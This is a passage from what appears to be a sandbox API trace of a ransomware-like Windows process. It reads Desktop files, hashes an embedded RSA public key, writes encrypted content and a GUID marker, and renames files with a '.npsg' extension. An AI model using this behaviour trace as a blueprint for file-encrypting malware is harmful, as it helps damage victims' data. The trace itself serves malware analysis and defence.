dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400098 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400068 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400050 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400038 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94ff0 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.242] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0x2bad, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, lpNumberOfBytesWritten=0x39afb14*=0x2bad, lpOverlapped=0x0) returned 1 [0236.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.243] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2bb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.243] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.243] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.243] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.243] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.243] CloseHandle (hObject=0x644) returned 1 [0236.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b8f7a8 [0236.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0236.248] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hDFbsew2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdfbsew2.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hDFbsew2.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdfbsew2.jpg.npsg")) returned 1 [0236.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.249] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.251] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb9e5b40, ftCreationTime.dwHighDateTime=0x1d5be56, ftLastAccessTime.dwLowDateTime=0xbc839960, ftLastAccessTime.dwHighDateTime=0x1d5c1ff, ftLastWriteTime.dwLowDateTime=0xbc839960, ftLastWriteTime.dwHighDateTime=0x1d5c1ff, nFileSizeHigh=0x0, nFileSizeLow=0x14147, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IZMpnRM1tsO.wav", cAlternateFileName="IZMPNR~1.WAV")) returned 1 [0236.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IZMpnRM1tsO.wav") returned=".wav" [0236.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IZMpnRM1tsO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\izmpnrm1tso.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.251] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=82247) returned 1 [0236.251] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.254] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14121, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.256] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.256] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14147, lpOverlapped=0x0) returned 1 [0236.258] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.258] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.258] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.258] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.259] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.259] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.259] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.259] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.259] GetLastError () returned 0x0 [0236.259] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.259] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.259] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.259] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.260] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14150) returned 0x3b95d50 [0236.260] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94ff0 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95038 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400080 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.261] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400098 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400080 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.262] GetCurrentThreadId () returned 0x5b4 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688480 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.263] GetCurrentThreadId () returned 0x5b4 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400080 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400098 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.264] HeapFree (in: hHeap=0x620000, 